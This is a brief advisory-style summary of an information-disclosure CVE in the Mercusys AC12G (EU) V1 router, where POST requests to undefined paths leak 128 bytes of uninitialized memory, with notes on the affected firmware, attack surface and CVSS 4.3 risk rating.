The CVE describes that the Mercusys AC12G (EU) V1 router returns 128 bytes of uninitialized internal buffer content when it receives an HTTP POST request to an undefined path. This implies that an unauthenticated attacker who can reach the device over the network can obtain a chunk of the router’s internal state through a simple HTTP request, resulting in a privacy leak of potentially sensitive system data. The weakness is a typical information‑disclosure flaw, allowing a visible breach of confidentiality but not directly compromising authentication or control of the system.

The affected product is the Mercusys AC12G (EU) V1 router running firmware version AC12G(EU)_V1_200909. No other vendors or products are listed.

The vulnerability can be exploited by an attacker with network visibility to the device, sending a POST request to any undefined URI. Since the flaw does not require authentication and occurs on an HTTP interface, the attack surface exists for anyone on the same subnet or through any forwarded ports. The EPSS score is not available, but the lack of a KEV listing suggests the exploit is not yet actively leveraged. The CVSS score is 4.3, indicating a moderate risk, while the impact is limited to confidential data exposure with no direct code execution or denial‑of‑service. The risk is moderate, and the probability of exploitation is low to moderate, depending on the attacker’s proximity to the device.